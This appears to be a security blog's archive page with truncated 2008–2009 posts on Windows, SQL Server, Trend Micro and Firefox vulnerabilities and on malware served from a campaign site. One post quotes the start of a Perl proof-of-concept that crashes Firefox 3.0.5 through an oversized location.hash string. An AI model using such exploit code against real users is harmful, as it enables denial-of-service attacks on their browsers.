Monday, January 26th, 2009 The 'RunAs' application included with Microsoft Windows is prone to a local information-disclosure vulnerability that may reveal information about password lengths.A local attacker may exploit this issue to gain information about user passwords. This may aid in further attacks, such as brute-force or dictionary attacks against passwords.An attacker requires local, ...
Posted in Security, Windows | No Comments
Monday, January 26th, 2009 A social networking site operated by the 2008 Barack Obama campaign is serving up malware to unwary visitors a full week after the tactic was reported, a security researcher said today.My.BarackObama.com, still active after the innauguration last week of President Obama, is being used by hackers trying to dupe users ...
Posted in Internet, Privacy, Security | No Comments
Tuesday, December 23rd, 2008 #!/usr/bin/perl
# mzff_lhash_dos.pl
# Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# Crash on Vista, play with it on XP$filename = $ARGV[0];
if(!defined($filename))
{print "Usage: $0 <filename.html>\n\n";}$head = "<html>" . "\n" . "<script type=\"text/javascript\">" . "\n";
$trig = "location.hash = \"" . "A" x 20000000 . "\";" ...
Posted in Coding, Internet, Security | No Comments
Monday, December 22nd, 2008 Microsoft late Monday issued a pre-patch advisory confirming a remote code execution vulnerability affecting its SQL Server line.The vulnerability, publicly disclosed with exploit code more than two weeks ago, affects Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2005 Express Edition, Microsoft SQL Server 2000 Desktop Engine ...
Posted in Coding, Internet, Networking, Privacy, Security, Software, Windows | No Comments
Monday, December 22nd, 2008 A bug in Trend Micro's free online virus scanning service can be used by hackers to hijack Windows PCs running Internet Explorer, security researchers warned.Attackers able to dupe users into visiting a malicious Web page could exploit a vulnerability in the custom ActiveX control that Trend Micro distributes to users ...
Posted in Coding, Internet, Security | No Comments
